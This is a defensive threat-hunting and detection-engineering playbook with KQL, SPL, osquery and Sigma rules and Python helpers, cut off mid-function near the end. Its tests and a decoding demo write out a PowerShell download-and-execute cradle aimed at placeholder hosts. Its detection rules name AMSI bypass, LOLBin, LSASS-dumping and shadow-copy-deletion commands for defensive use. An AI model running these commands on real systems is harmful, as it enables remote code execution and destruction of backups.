Detection & Hunting: A Complete Technical Playbook for Modern Defenders

By CyberDudeBivash. Precise, engineering-grade threat intel for blue teams.

Executive summary

Detection and hunting are how defenders turn telemetry into decisions. Detection engineering codifies known bad (TTPs) into reliable, low-noise analytics. Threat hunting is the hypothesis-driven search for the unknown using context, anomaly signals, and analyst intuition. This playbook gives you a production-ready approach: what data to collect, how to shape it, patterns to detect, practical queries for Windows/Linux/Cloud, hunting workflows, quality gates, and KPIs.


1) Foundations: detection vs hunting

  • Detection engineering: repeatable analytics (“detections-as-code”) with tests, owners, deployment pipelines, and SLAs. Output = alerts.
  • Threat hunting: iterative investigations without waiting for alerts. Output = new detections, intel, hardening tasks.

Both share the same raw materials: telemetry → normalization → enrichment → analytics → action.


2) Telemetry strategy (Minimal Viable Telemetry)

Endpoint

  • Process: parent/child, full command line, integrity level, hashes, signer, image path.
  • File: create/rename/delete, entropy, extension/type mismatch.
  • Registry (Win): run keys, services, LSA providers.
  • Network: per-process flows (dst, port, bytes, JA3/JA4, SNI/host).
  • Memory: module loads, injection indicators (RWX, VirtualAllocEx/CreateRemoteThread).

Identity & SaaS

  • Auth logs: success/fail, MFA, geo, device posture, risk flags.
  • OAuth: consent grants, new app registrations, token lifetimes/scopes.
  • Mail/Drive/Share: sharing changes, mass downloads/deletes.

Cloud

  • Control plane: IAM changes, policy updates, key usage.
  • Data plane: object access, egress byte deltas.
  • Compute: metadata service access, container exec/priv-esc, unusual images.

Network (sensor or cloud PCAP/flow)

  • DNS (query name, NXDomain rate, TTL), HTTP (host, path, UA), TLS (SNI, JA3/JA4), NetFlow.

Normalize with a schema (ECS/OSSEM) and time-sync everything (NTP). Enrich with asset/owner tags, GeoIP/ASN, threat intel, and process reputation.
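Below is a minimal Python sketch of the normalize-then-enrich step. It maps one raw process-creation record onto a handful of ECS field names (`@timestamp`, `host.name`, `user.name`, `process.name`, `process.command_line`, `process.parent.name`). It then attaches owner tags as flattened `labels.*` keys.

Some names are hypothetical stand-ins for whatever your sensor and CMDB actually emit:
- the raw field names (`epoch`, `computer`, `user`, `image`, `cmdline`, `parent_image`);
- the `ASSET_TAGS` inventory.

GeoIP/ASN and threat-intel lookups would slot into `enrich` the same way.

```python
from datetime import datetime, timezone

# Hypothetical asset inventory used for enrichment (in practice a CMDB/asset export).
ASSET_TAGS = {"WS-0142": {"owner": "finance", "criticality": "high"}}


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def to_ecs(raw: dict) -> dict:
    """Map a raw process-creation record (hypothetical vendor field names)
    onto a few Elastic Common Schema (ECS) fields."""
    return {
        # UTC ISO-8601 timestamps keep events from different sources comparable.
        "@timestamp": datetime.fromtimestamp(raw["epoch"], tz=timezone.utc).isoformat(),
        "host.name": raw["computer"],
        "user.name": raw["user"],
        "process.name": _basename(raw["image"]),
        "process.command_line": raw["cmdline"],
        "process.parent.name": _basename(raw["parent_image"]),
    }


def enrich(event: dict) -> dict:
    """Attach owner/criticality labels; unknown hosts are tagged explicitly."""
    tags = ASSET_TAGS.get(event["host.name"], {"owner": "unknown", "criticality": "unknown"})
    return {**event, "labels.owner": tags["owner"], "labels.criticality": tags["criticality"]}


raw = {
    "epoch": 1700000000,
    "computer": "WS-0142",
    "user": "alice",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "cmdline": "powershell.exe -nop -w hidden",
    "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
}
event = enrich(to_ecs(raw))
print(event["process.parent.name"], event["labels.owner"])  # winword.exe finance
```

Unknown hosts get an explicit `unknown` owner rather than a missing field. That keeps "who owns this box?" gaps visible in dashboards.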


3) Detection engineering lifecycle

  1. Hypothesis/TTP (map to ATT&CK sub-technique).
  2. Data contract (fields required, sources).
  3. Rule/analytic (KQL/SPL/Sigma/EQL).
  4. Tests: unit (synthetic logs), replay (pcaps/evt), adversary emulation (Atomic Red Team).
  5. Quality gates: data freshness, field completeness, cardinality limits, false-positive review.
  6. Deploy with detections-as-code (Git + CI/CD). Track owner, SLA, MTTD, and PPV (precision).
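Step 4 is easiest to picture with a toy example. Assume a detection can be expressed as a Python predicate over normalized events. The sketch below is a hypothetical stand-in for the suspicious-PowerShell analytic in section 4, and it uses case-insensitive substring matching rather than KQL's term-based `has_any`.

Under that assumption, unit tests on synthetic logs are ordinary pytest-style test functions: one true positive, plus near-misses that must stay quiet.

```python
SUSPICIOUS_TOKENS = ("iex", "downloadstring", "frombase64string", "-enc",
                     "amsi", "add-mppreference", "bypass")


def suspicious_powershell(event: dict) -> bool:
    """Python stand-in for the PowerShell analytic (case-insensitive substring
    match, a simplification of KQL `has_any` term matching)."""
    name = event.get("FileName", "").lower()
    cmd = event.get("ProcessCommandLine", "").lower()
    return name in ("powershell.exe", "pwsh.exe") and any(t in cmd for t in SUSPICIOUS_TOKENS)


# Unit tests on synthetic events: one true positive and two near-misses.
def test_download_cradle_fires():
    evt = {"FileName": "powershell.exe",
           "ProcessCommandLine": "powershell -nop IEX (New-Object Net.WebClient).DownloadString('http://x')"}
    assert suspicious_powershell(evt)


def test_benign_admin_script_is_quiet():
    evt = {"FileName": "powershell.exe", "ProcessCommandLine": r"powershell -File C:\ops\backup.ps1"}
    assert not suspicious_powershell(evt)


def test_other_binaries_are_ignored():
    evt = {"FileName": "cmd.exe", "ProcessCommandLine": "cmd /c echo IEX"}
    assert not suspicious_powershell(evt)


if __name__ == "__main__":
    # pytest would discover the test_* functions; calling them keeps the sketch dependency-free.
    for test in (test_download_cradle_fires, test_benign_admin_script_is_quiet,
                 test_other_binaries_are_ignored):
        test()
    print("3 detection tests passed")
```

In a detections-as-code repo, these fixtures would live next to the rule, so CI fails the merge when a rule edit breaks a known true positive or starts firing on a known benign sample.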

Tip: write detections around behaviors, not hashes. Hashes rot; TTPs persist.


4) Core behavioral patterns (with ready-to-use analytics)

A) Initial access & execution (Windows)

Suspicious PowerShell (download/execution, AMSI bypass attempts)

DeviceProcessEvents
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| where ProcessCommandLine has_any ("IEX","DownloadString","FromBase64String","-enc","AMSI","Add-MpPreference","Bypass")
| extend Parent=InitiatingProcessFileName
| project Timestamp, DeviceName, AccountName, Parent, FileName, ProcessCommandLine
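When this fires on `-enc`, the first triage step is usually decoding the payload. PowerShell's `-EncodedCommand` takes Base64 of the UTF-16LE bytes of the script, so a small helper can recover the original text.

This is a sketch. The flag-matching rule is a simplification of how PowerShell resolves parameter names: it accepts any `-e...` prefix of `EncodedCommand`, plus the `-ec` alias. `decode_encoded_command` is a hypothetical helper name.

```python
import base64
import re

# A dash-prefixed flag starting with "e" and its argument; filtered in code below.
FLAG_RE = re.compile(r"(?:^|\s)-(e\w*)\s+(\S+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script passed via -EncodedCommand (or an abbreviation such as
    -e, -enc, or the -ec alias), or None. PowerShell expects Base64 of UTF-16LE text."""
    for match in FLAG_RE.finditer(cmdline):
        flag, arg = match.group(1).lower(), match.group(2)
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy is not an encoded command
        try:
            return base64.b64decode(arg, validate=True).decode("utf-16-le")
        except ValueError:
            # binascii.Error and UnicodeDecodeError are both ValueError subclasses.
            return None  # not valid Base64 / UTF-16LE: leave for manual review
    return None


script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(f"powershell.exe -nop -w hidden -enc {blob}"))
```

Decoded scripts often contain a second layer (`FromBase64String`, compression, string concatenation). Treat the output as the next artifact to inspect, not as the final answer.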

LOLBin abuse

  • rundll32, mshta, wmic, certutil, or bitsadmin launching network connections or scripts.

B) Persistence & privilege escalation

New auto-start extensibility points

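DeviceRegistryEvents
| where ActionType in ("RegistryValueSet","RegistryKeyCreated")
| where RegistryKey has_any (
    @"\Software\Microsoft\Windows\CurrentVersion\Run",
    @"\Services")
    // Shell is a value under ...\Policies\System, not a subkey, so match it by value name
    or (RegistryKey has @"\Policies\System" and RegistryValueName =~ "Shell")
| project Timestamp, DeviceName, InitiatingProcessFileName, RegistryKey, RegistryValueName, RegistryValueData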

Service installs from user-writable paths

DeviceProcessEvents
| where FileName in~ ("sc.exe","powershell.exe")
| where ProcessCommandLine has "create" and ProcessCommandLine contains "binPath="
| where ProcessCommandLine has_any ("\\AppData\\","\\Temp\\") or ProcessCommandLine contains ".\\"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
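To triage hits, it helps to pull the `binPath=` value out of the command line and judge the path itself. Here is a minimal Python sketch, assuming the classic `sc.exe create <name> binPath= <path>` syntax.

`service_binpath`, `is_user_writable_service`, and the fragment list are illustrative names. `New-Service -BinaryPathName` invocations are not handled.

```python
import re

# Path fragments treated as user-writable here (the query's \AppData\ and \Temp\);
# extend for your estate.
USER_WRITABLE = ("\\appdata\\", "\\temp\\")
BINPATH_RE = re.compile(r'binpath=\s*(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def service_binpath(cmdline: str):
    """Extract the binPath= value from an `sc.exe create` command line, or None."""
    if not re.search(r"\bcreate\b", cmdline, re.IGNORECASE):
        return None
    match = BINPATH_RE.search(cmdline)
    return (match.group(1) or match.group(2)) if match else None


def is_user_writable_service(cmdline: str) -> bool:
    """True when the new service binary lives in a user-writable or relative path."""
    path = service_binpath(cmdline)
    if path is None:
        return False
    lowered = path.lower()
    return lowered.startswith(".\\") or any(frag in lowered for frag in USER_WRITABLE)


print(is_user_writable_service(r'sc.exe create Updater binPath= "C:\Users\bob\AppData\Local\upd.exe" start= auto'))  # True
print(is_user_writable_service(r"sc.exe create Spool2 binPath= C:\Windows\System32\spoolsv.exe"))  # False
```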

C) Credential access & discovery

Suspicious LSASS access

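DeviceProcessEvents
// Command-line view only: handle access to lsass.exe itself does not appear in process-creation events
| where ProcessCommandLine has "lsass"
    or (ProcessIntegrityLevel != "System"
        and InitiatingProcessFileName !in~ ("procexp64.exe")
        and ProcessCommandLine has_any ("ReadProcessMemory","MiniDump"))
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine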

Kerberoasting prep

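SecurityEvent
| where EventID == 4769    // Kerberos service ticket requested (domain controller Security log)
| parse EventData with * 'ServiceName">' Svc "<" *
| parse EventData with * 'TicketEncryptionType">' EncType "<" *
| parse EventData with * 'TargetUserName">' Requester "<" *
| where EncType == "0x17" and Svc !endswith "$" and Svc !~ "krbtgt"   // RC4 tickets for user SPNs
| summarize Requests=count(), SPNs=dcount(Svc) by Requester, bin(TimeGenerated, 15m)
| where Requests > 50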

D) Lateral movement

WMI/PSRemoting from workstations

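DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("wmic.exe","winrs.exe","powershell.exe")
| where RemotePort in (135, 5985, 5986)    // RPC/DCOM (WMI) and WinRM HTTP/HTTPS
| join kind=inner (DeviceInfo | where DeviceType == "Workstation" | distinct DeviceId) on DeviceId
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteIP, RemotePort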

E) Command & control / beaconing

Flow periodicity & low-and-slow

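| tstats `summariesonly` count from datamodel=Network_Traffic by All_Traffic.src All_Traffic.dest All_Traffic.dest_port _time span=1s
| rename "All_Traffic.*" as *
| sort 0 src dest dest_port _time
| streamstats current=f last(_time) as prev_time by src dest dest_port
| eval delta=_time-prev_time
| stats count as conns, avg(delta) as avg_delta, stdev(delta) as sd_delta by src dest dest_port
| eval jitter=sd_delta/avg_delta
| where conns > 20 AND jitter < 0.15

(Regular inter-arrival times with small jitter mark beacon suspects; check their byte volume next, since low-and-slow beacons send little data.)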
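The same idea is easy to prototype offline on exported connection timestamps. This sketch computes jitter for one src→dest pair as the coefficient of variation of inter-arrival times, that is, their standard deviation divided by their mean. It reuses the 0.15 threshold.

The `min_events=20` floor is an assumption of this sketch. It stops a handful of connections from looking periodic by accident.

```python
from statistics import mean, pstdev


def beacon_jitter(timestamps):
    """Coefficient of variation (stdev / mean) of inter-arrival times in seconds.
    Values near 0 mean connections arrive on a fixed schedule."""
    ts = sorted(timestamps)
    deltas = [later - earlier for earlier, later in zip(ts, ts[1:])]
    if len(deltas) < 2 or mean(deltas) == 0:
        return None  # too little data to judge periodicity
    return pstdev(deltas) / mean(deltas)


def is_beacon_suspect(timestamps, max_jitter=0.15, min_events=20):
    """Flag a src->dest pair with enough connections and a highly regular rhythm."""
    jitter = beacon_jitter(timestamps)
    return len(timestamps) >= min_events and jitter is not None and jitter < max_jitter


# ~60 s beacon with a second or two of jitter vs. bursty interactive traffic.
beacon = [60 * i + (i % 3) for i in range(30)]
bursty = [600 * k + j for k in range(10) for j in (0, 1, 2)]
print(is_beacon_suspect(beacon), is_beacon_suspect(bursty))  # True False
```

Attackers add random sleep jitter precisely to defeat this ratio. Treat a low value as a strong lead and a high value as inconclusive.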

F) Exfiltration

DNS tunneling heuristic

| eval qlen=len(query)
| stats count, avg(qlen) as avglen, dc(query) as uniq, values(rcode) as r by src_ip
| where avglen > 40 OR uniq > 500
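A Python version of the same heuristic works on exported DNS logs. It groups queries per source and applies the 40-character and 500-unique thresholds. It also reports the mean Shannon entropy of the leftmost label as extra context, since encoded payloads tend to push entropy up.

The `(src_ip, query)` record shape and the entropy field are assumptions of this sketch, not part of the SPL.

```python
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return sum(c / n * math.log2(n / c) for c in Counter(s).values())


def dns_tunnel_suspects(records, max_avglen=40, max_unique=500):
    """records: iterable of (src_ip, query). Applies the SPL thresholds and adds the
    mean entropy of the leftmost label as extra triage context."""
    by_src = defaultdict(list)
    for src, query in records:
        by_src[src].append(query)
    suspects = {}
    for src, queries in by_src.items():
        avglen = sum(map(len, queries)) / len(queries)
        uniq = len(set(queries))
        if avglen > max_avglen or uniq > max_unique:
            labels = [q.split(".")[0] for q in queries]
            suspects[src] = {
                "avglen": round(avglen, 1),
                "uniq": uniq,
                "label_entropy": round(sum(map(shannon_entropy, labels)) / len(labels), 2),
            }
    return suspects


# Hex-encoded "data" in the leftmost label vs. ordinary lookups.
tunnel = [("10.0.0.5", hashlib.sha256(str(i).encode()).hexdigest()[:32] + ".data.example.com")
          for i in range(20)]
normal = [("10.0.0.7", "www.example.com")] * 20
print(dns_tunnel_suspects(tunnel + normal))
```

CDNs and some security products also generate long, random-looking labels. An allowlist of known registered domains keeps this heuristic usable.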

Sudden egress spike to new ASN

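let Baseline = NetworkFlows   // hypothetical flow table with byte counts + ASN enrichment: Timestamp, DeviceId, RemoteIP, ASN, BytesSent
    | where Timestamp between (ago(6h + 10m) .. ago(10m))   // the preceding 6 hours
    | summarize bytes=sum(BytesSent) by DeviceId, bin(Timestamp, 10m)
    | summarize mu=avg(bytes), sigma=stdev(bytes) by DeviceId;
NetworkFlows
| where Timestamp > ago(10m)
| summarize bytes=sum(BytesSent) by DeviceId, RemoteIP, ASN
| join kind=inner Baseline on DeviceId
| extend z = (bytes - mu) / sigma
| where sigma > 0 and z > 6 and ASN !in ("YourTrustedCDN","CorpProxy")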
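The rolling z-score is easier to reason about outside the query engine. This sketch scores each 10-minute bin of one device's egress against the preceding 36 bins (6 hours), using the same z > 6 cut-off.

The input shape, a plain list of per-bin byte counts, is an assumption. The current bin joins the baseline only after it has been scored, so a spike cannot dilute its own score.

```python
from collections import deque
from statistics import mean, pstdev


def egress_spikes(byte_series, window=36, threshold=6.0):
    """byte_series: bytes sent per 10-minute bin for one device, oldest first.
    window=36 bins = 6 hours. Yields (bin_index, bytes, z) when a bin's z-score
    against the preceding window exceeds the threshold."""
    history = deque(maxlen=window)
    for i, value in enumerate(byte_series):
        if len(history) == window:
            mu, sigma = mean(history), pstdev(history)
            if sigma > 0:  # a perfectly flat baseline has no meaningful z-score
                z = (value - mu) / sigma
                if z > threshold:
                    yield i, value, round(z, 1)
        history.append(value)  # the current bin joins the baseline only after scoring


series = [1000, 1200] * 18 + [50_000]   # 6 h of steady egress, then a burst
print(list(egress_spikes(series)))      # [(36, 50000, 489.0)]
```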

G) Ransomware staging

  • Rapid file rename/write with high entropy, shadow copy deletion, suspicious backup/defender tampering.

DeviceProcessEvents
| where ProcessCommandLine has_all ("vssadmin", "delete", "shadows")
    or ProcessCommandLine has_all ("wbadmin", "delete")
    or ProcessCommandLine has_all ("bcdedit", "recoveryenabled", "no")
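The behavioral half of the bullet (rapid renames, high-entropy writes) can be sketched in Python. `byte_entropy` shows why encrypted output stands out: it approaches 8 bits per byte.

The following are assumptions for illustration:
- the event tuples `(epoch_seconds, process_id, action)`;
- the threshold of 100 renames per 60 seconds;
- the helper names.

```python
import math
from collections import Counter, defaultdict, deque


def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; encrypted or compressed content is close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return sum(c / n * math.log2(n / c) for c in Counter(data).values())


def rename_bursts(events, window_s=60, threshold=100):
    """events: (epoch_seconds, process_id, action) tuples in time order.
    Returns the process ids with >= threshold renames inside any window_s span."""
    recent = defaultdict(deque)
    flagged = set()
    for ts, pid, action in events:
        if action != "rename":
            continue
        q = recent[pid]
        q.append(ts)
        while ts - q[0] > window_s:  # drop renames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(pid)
    return flagged


encryptor = [(i * 0.2, 4242, "rename") for i in range(150)]   # 150 renames in 30 s
office = [(i * 5.0, 7, "rename") for i in range(300)]          # one save-as every 5 s
print(rename_bursts(sorted(encryptor + office)))               # {4242}
print(byte_entropy(bytes(range(256))), byte_entropy(b"A" * 64))  # 8.0 0.0
```

Compressed archives and media files are also near 8 bits per byte. Entropy works best as a second signal alongside the rename burst, not on its own.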

5) Linux & macOS essentials

Linux: new listener by an unusual binary

-- osquery
SELECT p.pid, p.path, l.port, l.address
FROM processes p JOIN listening_ports l ON p.pid=l.pid
WHERE p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/bin/%';

Linux: privilege escalation surfaces

  • sudoers edits, setuid bit changes, unprivileged eBPF use, /etc/ld.so.preload changes, cron entries in user-writable dirs.
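For the setuid item, here is a minimal Python sweep of user-writable directories. The directory list is an assumption to adapt per host. This only covers one bullet; sudoers, eBPF, `ld.so.preload`, and cron changes need their own checks.

```python
import os
import stat

# Directories an unprivileged user can usually write to; adjust per host.
USER_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home")


def find_setid_files(roots=USER_WRITABLE_DIRS):
    """Return regular files under `roots` with the setuid or setgid bit set."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):  # unreadable dirs are skipped silently
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: report symlinks themselves, not their targets
                except OSError:
                    continue  # file vanished or is unreadable
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append(path)
    return hits
```

Calling `find_setid_files()` with the defaults, or with your own roots, returns candidates. A setuid binary under /tmp or a home directory is rarely legitimate and deserves a look at its owner and creation time.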

macOS: persistence

  • New LaunchAgents/LaunchDaemons (~/Library/LaunchAgents/, /Library/LaunchAgents/, /Library/LaunchDaemons/) with network reach-outs; unsigned binaries allowed via user click → hunt for Gatekeeper bypass traces.
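Enumerating launchd jobs is a natural starting point for that hunt. The sketch below reads each `.plist` with the standard-library `plistlib`. It reports the job's `Label` and the binary from `Program` or `ProgramArguments[0]`.

The `looks_suspicious` path heuristic is an assumption. Network reach-outs and signature checks would come from other telemetry.

```python
import glob
import os
import plistlib
from xml.parsers.expat import ExpatError

LAUNCH_DIRS = ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons")


def launch_jobs(dirs=LAUNCH_DIRS):
    """Yield (plist_path, label, program) for every launchd job definition found."""
    for d in dirs:
        for path in glob.glob(os.path.join(os.path.expanduser(d), "*.plist")):
            try:
                with open(path, "rb") as fh:
                    job = plistlib.load(fh)
            except (OSError, plistlib.InvalidFileException, ExpatError, ValueError):
                continue  # unreadable or malformed plist: worth a manual look on its own
            if not isinstance(job, dict):
                continue
            args = job.get("ProgramArguments") or []
            program = job.get("Program") or (args[0] if args else "")
            yield path, job.get("Label", ""), program


def looks_suspicious(program: str) -> bool:
    """Heuristic: job binaries in world-writable or hidden locations."""
    p = program.lower()
    return p.startswith(("/tmp/", "/private/tmp/", "/users/shared/")) or "/." in p
```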

6) Cloud detections that matter

Azure AD risky impossible travel

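let KnownCountries = SigninLogs          // each user's sign-in countries over the prior 30 days
    | where TimeGenerated between (ago(30d) .. ago(1d)) and ResultType == "0"
    | summarize Known=make_set(Location) by UserPrincipalName;
SigninLogs
| where TimeGenerated > ago(1d) and ResultType == "0"           // successful sign-ins only
| summarize Countries=make_set(Location), FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 1h)
| where array_length(Countries) > 1                              // two or more countries inside one hour
| join kind=inner KnownCountries on UserPrincipalName
| extend NewCountries=set_difference(Countries, Known)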
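The sign-in query flags several countries per hour. A classic complement is a speed check between consecutive sign-ins.

This Python sketch assumes sign-ins are already geolocated to latitude/longitude and uses the haversine great-circle distance. It treats anything faster than 900 km/h as suspect. That cut-off is an assumption, and VPN egress and coarse IP geolocation will produce false positives.

```python
import math
from datetime import datetime


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres (mean Earth radius 6371 km)."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def impossible_travel(signins, max_kmh=900.0):
    """signins: (datetime, lat, lon) tuples for one user. Returns consecutive
    pairs whose implied speed exceeds max_kmh (roughly airliner cruising speed)."""
    ordered = sorted(signins)
    alerts = []
    for (t1, lat1, lon1), (t2, lat2, lon2) in zip(ordered, ordered[1:]):
        km = haversine_km(lat1, lon1, lat2, lon2)
        hours = (t2 - t1).total_seconds() / 3600
        speed = km / hours if hours > 0 else (math.inf if km > 0 else 0.0)
        if speed > max_kmh:
            alerts.append((t1, t2, round(km), speed))
    return alerts


signins = [
    (datetime(2024, 5, 1, 9, 0), 51.5074, -0.1278),      # London
    (datetime(2024, 5, 1, 10, 0), 51.5074, -0.1278),     # London again
    (datetime(2024, 5, 1, 10, 30), -33.8688, 151.2093),  # Sydney 30 minutes later
]
for t1, t2, km, speed in impossible_travel(signins):
    print(f"{t1:%H:%M} -> {t2:%H:%M}: {km} km at {speed:,.0f} km/h")
```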

AWS key misuse

  • AccessKey used from new ASN + S3 List/Get flood + CloudTrail DeleteTrail attempts → high-risk triage.

-- Athena/CloudTrail Lake (pseudocode; add a time-range filter for your table)
SELECT userIdentity.accessKeyId, COUNT(*) AS c
FROM cloudtrail
WHERE eventSource = 's3.amazonaws.com' AND eventName IN ('GetObject','ListBucket')
AND sourceIPAddress NOT IN (SELECT ip FROM allowlist)
GROUP BY userIdentity.accessKeyId
HAVING COUNT(*) > 5000;

GCP service account drift

  • New key creation followed by BigQuery export → egress monitor around the key’s first use.

7) Threat hunting workflow (4-hour cycle)

  1. Choose a seed: a TTP (e.g., DLL sideloading), an anomaly (new JA3), or new intel (domain set).
  2. State a hypothesis: “We will find unsigned binaries sideloaded by Office spawning rundll32 with network egress.”
  3. Scoping queries: broad → narrow. Save notebooks (Jupyter + MSTICPy/SQL/SPL).
  4. Pivot: by parent process, user, host, ASN, signer, hash cluster, JA3 cluster.
  5. Document leads: promote to detection if repeatable; file hardening/IR tickets if real risk.
  6. Retro hunt (30–90 days) for newly found IOCs/TTPs.

Add a hunt register: hypothesis, coverage, queries, outcomes, follow-ups.


8) Machine learning that actually helps

  • Outlier/anomaly: z-scores/Isolation Forest on per-host command counts, child-process trees, DNS lengths.
  • Beacon detection: spectral analysis (FFT) on inter-arrival times.
  • Clustering: group command lines (TF-IDF + HDBSCAN) to surface “weird” exec strings.
  • Graph features: user–host–process graphs; detect unusual edges.
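The spectral-analysis bullet can be made concrete. A beacon that fires every P minutes puts a peak in the Fourier spectrum of its per-minute event counts at frequency 1/P.

The dependency-free sketch below uses a naive discrete Fourier transform. It gives the same spectrum as an FFT, just in O(n²) time. The 0.9 harmonic-tolerance factor and the function name are assumptions.

```python
import cmath


def dominant_period(counts):
    """counts: events per time bin (e.g. per minute) for one src->dest pair.
    Returns (period_in_bins, share_of_spectral_power) for the strongest periodic
    component, or None for a flat series. Uses a naive O(n^2) discrete Fourier
    transform; an FFT produces the same spectrum faster."""
    n = len(counts)
    avg = sum(counts) / n
    x = [c - avg for c in counts]  # remove the constant (DC) component
    power = []
    for k in range(1, n // 2 + 1):
        coeff = sum(x[t] * cmath.exp(-2j * cmath.pi * k * t / n) for t in range(n))
        power.append(abs(coeff) ** 2)
    total = sum(power)
    if total < 1e-9:
        return None
    peak = max(power)
    # Impulse-like beacons also light up harmonics (2k, 3k, ...) at similar strength,
    # so take the lowest frequency close to the peak as the fundamental.
    k = next(i for i, p in enumerate(power, start=1) if p >= 0.9 * peak)
    return n / k, power[k - 1] / total


beacon = [1 if minute % 5 == 0 else 0 for minute in range(120)]  # one hit every 5 minutes
period, share = dominant_period(beacon)
print(f"period={period:.1f} bins, share={share:.2f}")  # period=5.0 bins, share=0.50
```

A high share of power at one period means the traffic is dominated by a single rhythm. That is a good feature to feed into prioritization rather than a verdict.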

Guardrails: strict explainability, feedback loops to analysts, and feature drift monitors. Use ML to prioritize and suggest pivots, not to auto-close cases.


9) Detections-as-code: quality & testing

  • Repo layout: /detections/<domain>/<technique>/<rule>.yml (Sigma), with test fixtures, sample logs, owners.
  • Pre-merge CI: schema lint, data-contract checks, simulated log replays, expected FP rate vs baseline.
  • Post-deploy canary: 1–5% of fleet; compare alert precision; auto-rollback if PPV < threshold.
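The canary gate reduces to a small decision function. In this sketch, `CanaryResult`, `canary_decision`, and the thresholds (PPV ≥ 0.5 after at least 10 triaged alerts) are hypothetical. The point is that extending the canary is a valid third outcome when too few alerts have been triaged to measure precision.

```python
from dataclasses import dataclass


@dataclass
class CanaryResult:
    """Triage outcomes for one rule while it runs on the canary slice of the fleet."""
    rule_id: str
    true_positives: int
    false_positives: int

    @property
    def alerts(self) -> int:
        return self.true_positives + self.false_positives

    @property
    def ppv(self) -> float:
        """Precision: share of triaged alerts confirmed as true positives."""
        return self.true_positives / self.alerts if self.alerts else 0.0


def canary_decision(result: CanaryResult, min_ppv: float = 0.5, min_alerts: int = 10) -> str:
    """'extend' until enough alerts are triaged, then 'promote' or 'rollback' on PPV.
    min_ppv and min_alerts are illustrative values, not recommendations."""
    if result.alerts < min_alerts:
        return "extend"
    return "promote" if result.ppv >= min_ppv else "rollback"


for r in (CanaryResult("win_susp_ps", 8, 2), CanaryResult("dns_tunnel", 1, 19),
          CanaryResult("lsass_dump", 1, 2)):
    print(r.rule_id, round(r.ppv, 2), canary_decision(r))
```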

Coverage KPIs

  • % ATT&CK TTPs with at least one high-confidence analytic.
  • Alert PPV (precision) per rule; MTTD, MTTR, and time-to-contain.
  • Data completeness (non-null critical fields) and ingest latency.

10) Triage cheatsheet (first 10 minutes)

  • Confirm behavior: execution + network + persistence? (Need ≥2 to escalate.)
  • Scope blast radius: same user, same signer, same JA3, same ASN.
  • Kill-chain phase: access, discovery, C2, actions on objectives → match controls.
  • Decide action: isolate host / block token / revoke OAuth consent / disable key / block domain.
  • Create feedback: If benign, write suppression rule with rationale and expiry.
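The escalation rule and the action menu can be encoded so that triage stays consistent across analysts. The two-of-three rule and the action list come straight from the checklist. The entity-kind keys (`host`, `token`, `oauth_app`, `access_key`, `domain`) are hypothetical names.

```python
BEHAVIOR_CLASSES = {"execution", "network", "persistence"}

# Containment options from the checklist, keyed by the kind of entity involved.
CONTAINMENT = {
    "host": "isolate host",
    "token": "block token",
    "oauth_app": "revoke OAuth consent",
    "access_key": "disable key",
    "domain": "block domain",
}


def triage(observed_behaviors, entities):
    """Return (escalate, actions): escalate when at least two behavior classes are
    confirmed, and list containment actions for the entity kinds involved."""
    confirmed = set(observed_behaviors) & BEHAVIOR_CLASSES
    escalate = len(confirmed) >= 2
    actions = [CONTAINMENT[kind] for kind in entities if kind in CONTAINMENT] if escalate else []
    return escalate, actions


print(triage({"execution", "network"}, ["host", "domain"]))  # (True, ['isolate host', 'block domain'])
print(triage({"network"}, ["host"]))                          # (False, [])
```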

Appendices

A) Sigma example — Suspicious CertUtil

title: Suspicious CertUtil With URL Download
id: 00000000-0000-0000-0000-000000000000  # placeholder: generate a real UUIDv4 for your rule
status: stable
logsource:
  product: windows
  category: process_creation
detection:
  selection_img:
    Image|endswith: '\certutil.exe'
  selection_flags:
    CommandLine|contains:
      - ' -urlcache '
      - ' -split '
  selection_url:
    CommandLine|contains: 'http'
  condition: all of selection_*
level: high
tags: [attack.command-and-control, attack.t1105]

B) Zeek hunting cues

  • weird.log: excessive trunc/rexmit → C2/bad middleboxes.
  • conn.log: periodic orig_pkts=1 resp_pkts=1 pairs.
  • dns.log: long labels, high NXDomain ratio.
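Zeek's TSV logs carry their own column names in a `#fields` header, which makes the conn.log cue easy to script. This sketch parses that header and counts repeated single-packet exchanges per (originator, responder, port).

`min_count=10` is an assumed threshold. The sketch only measures repetition, so periodicity still needs an inter-arrival check.

```python
from collections import Counter


def read_zeek_tsv(lines):
    """Yield one dict per record from a Zeek TSV log, keyed by its #fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#fields"):
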